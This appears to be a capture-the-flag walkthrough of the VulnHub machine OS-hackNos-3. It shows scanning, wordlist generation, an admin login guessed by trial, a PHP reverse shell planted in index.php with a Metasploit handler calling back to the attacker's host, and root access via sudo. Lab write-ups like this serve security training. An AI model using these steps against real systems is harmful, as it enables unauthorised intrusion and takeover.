Today We are solving os hacknos 3 vulnhub VM is created by Rahul Gehlaut and finding our 2 Flag first user And the second root (OS-hackNos-3 Walkthrough)
Every time-Solving our first step is scanning our network with the most popular network scanning kali Linux tool
netdiscover (netdiscover is scanning the full network and show all connected users).
Network Scanning
1 |
netdiscover |
After finding the target machine IP address we need to
perform a Nmap port scanning and finding which ports are open target machine
Port Scanning
1 |
nmap -A 192.168.1.12 |
We see target machine two ports are open (22 port running ssh server) and port (80 running httpd service) and
we see target machine http_title now see the request our browser
I am opening the HTTP request in browser and we see websec directory after enumeration the source code
I see websites websec directory running on cms application
sometime later_not see any Vulnerable plugin, thems And website footer see the contact email address
next step is finding a password to log in with admin account creating a short wordlist with cewl wordlist generator
1 |
cewl http://192.168.1.12/websec -d 2 -w wordlist.txt |
1 |
cat wordlist.txt |
I am trying one by one password for login admin account after trying 10-15 password we Succesful login admin account
- username: [email protected]
- password: Securityx
After login admin account uploading a php reverse shell click the Content button and click file manager
creating a msfvenom php reverse and paste it target index.php default web page file and click save button to save
starting our Metasploit msfconsole payload listener
and opening default web http://192.168.1.12/websec web browser and we got a meterpreter reverse connection
- msfconsole
- use exploit/multi/handler
- (our payload name) set payload php/meterpreter/reverse_tcp
- set lhost 192.168.1.5
- set lport 4545
- run
python importing for proper shell
1 |
python3 -c 'import pty;pty.spawn("/bin/bash")' |
After enumeration many directories we find a database file cat command to open the file and we see last line file fackespreadsheet encode text I am decoding the text online fackespreadsheet decoder
Decode Spreadsheet copy database text file and paste the website and click decode button to decode the file
we see decode text Security@x@
try the text for user blackdevil user password switching account And success full login with blackdevil account
1 |
su blackdevil |
Going the see our first user flag blackdevil directory
1 |
cat user.txt |
sudo -l command to we see sudoers file entry blacdevill user is run any command without password root
1 |
sudo -l |
1 |
sudo su |
Find our last root flag root directory root.txt
1 |
cd /root |
1 |
cat root.txt |
Os-hackNos-2 Walkthrough see here